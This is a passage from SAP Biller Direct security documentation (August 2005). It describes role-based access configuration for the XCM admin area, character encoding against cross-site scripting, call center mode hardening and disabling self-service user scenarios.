<security-constraint> <web-resource-collection> <web-resource-name>admin</web-resource-name> <url-pattern>/admin/*</url-pattern> </web-resource-collection> <auth-constraint> <role-name>bdadmin</role-name> </auth-constraint> </security-constraint> <login-config> <auth-method>BASIC</auth-method> <realm-name>bdadmin</realm-name> </login-config> <security-role> <role-name>bdadmin</role-name> </security-role> The role bdadmin is also declared in the file web-j2ee-engine.xml. Here the role bdadmin is mapped to the role administrators. This means that all users, who have the role of administrator, also implicitly have authorization for the role bdadmin: <?xml version="1.0" encoding="UTF-8"?> <web-j2ee-engine> <security-role-map>

<role-name>bdadmin</role-name>

<server-role-name>administrators</server-role-name>

</security-role-map>

<cookie-config/>

</web-j2ee-engine>

August 2005


If you do not want all those users with the role administrators to have access to XCM, remove the following entry: <?xml version="1.0" encoding="UTF-8"?> <web-j2ee-engine> <cookie-config/>

</web-j2ee-engine>

For additional information on security-constraints in the file web.xml and web-j2ee-engine.xml, visit the SAP Help Portal under help.sap.com. There choose SAP NetWeaver → language and release → Application Platform → Java Technology in the SAP Web Application Server → Development Manual → Developing Web Applications → J2EE Web Applications → Developing J2EE Web Applications → J2EE Web Components Configuration → Configuring Web Applications Security → Defining Web Applications Security Roles.

Reducing the Risk of Cross-Site Scripting Attacks You can find general information on cross-site scripting at, for example, www.cert.org. In the Web application SAP Biller Direct, the following characters of the parameters of the HTTP request are encoded:

Encoded Characters

Original character Encoded Character Note

<

>

{

}

[

]

&

?

&#X X stands for the Unicode value of the relevant character.

August 2005


In the output tables that contain the XMLFieldTag tag, the following special characters are encoded:

Encoded Characters for XMLFieldTag and XMLInputFieldTag

Original character Encoded Character Note

<

>

“

’

%

(

)

{

}

[

]

&#X X stands for the Unicode value of the relevant character.

If you would like to encode additional special characters in additional parameters, you can either use the method Converter.encodeSpecialCharacters or else integrate your own coding in the JSPs.

Secure Configuration of the Call Center Mode In the standard delivery of SAP Biller Direct, the call center mode is not switched on. You switch this mode on in Extended Configuration Management (XCM). The call center employees are able to access the data of all customers or business partners.

Recommendation Only switch call center mode on when it is definitely required.

If you have switched call center mode on, only grant the authorizations AC01 or CAC1 for authorization object F_ACT_EBPP (in FI-AR) or F_KK_EBPP (in FI-CA) to users who are permitted to access all customers or business partners. This means in most cases for your call center employees. You should note that when you assign the authorization AC01 or CAC1 to a Web user, this user can display any customer or business partner. To prevent this situation from arising, you should always exclude the activation of call enter mode in the Internet by URL when you install SAP Biller Direct, for example by the ON mode. For internal employees, you should set up a second SAP Biller Direct installation that works in call center mode, but is not accessible externally.

Further Information For additional information on configuring XCM, see the Configuration Guide for SAP Biller Direct under Business Customizing → Configuring the Web Application with the XCM.

For more information on authorizations, see the Configuration Guide for SAP Biller Direct under User Management.

August 2005


Hiding Scenarios If you do not want to support the scenario for creating new users, then you should delete the following section in file webbase-config.xml:

<screen name="newUserEdit"> <path>/jsp/content_edit_new_user_html.jsp</path> </screen> … <webaction path="/createuser_form" class="com.sap.fin.fscmbase.LogonAction"> <mapping result="newUserEdit” screen=”newUserEdit"/> </webaction> <webaction path="/createuser" class="com.sap.fin.fscmbase.LogonAction">

<mapping result="logon" screen="newUserEdit"/> <mapping result="newUserEdit" screen="newUserEdit"/> </webaction> If you do not want to support the scenario for resetting passwords via the Internet, then you should delete the following section in file webbase-config.xml:

<screen name="resetUserEdit"> <path>/jsp/content_edit_reset_user_html.jsp</path> </screen> … <webaction path="/resetpassword_form" class="com.sap.fin.fscmbase.LogonAction"> <mapping result="resetUserEdit" screen="resetUserEdit"/> </webaction> <webaction path="/resetpassword" class="com.sap.fin.fscmbase.LogonAction"> <mapping result="logon" screen="doLogon"/> <mapping result="resetUserEdit” screen="resetUserEdit"/> </webaction>

Transfer of Request Parameters Request parameters are converted by the tag parameter in Get-Parameter. They are transferred in the header of the HTTP request, and are consequently not encoded even if the HTTPS protocol is used for the data transfer.

Recommendation Do not transfer sensitive information (such as password or ebpp_mode) in the request parameters.

Biller Direct Security

Documents

Transcript of Biller Direct Security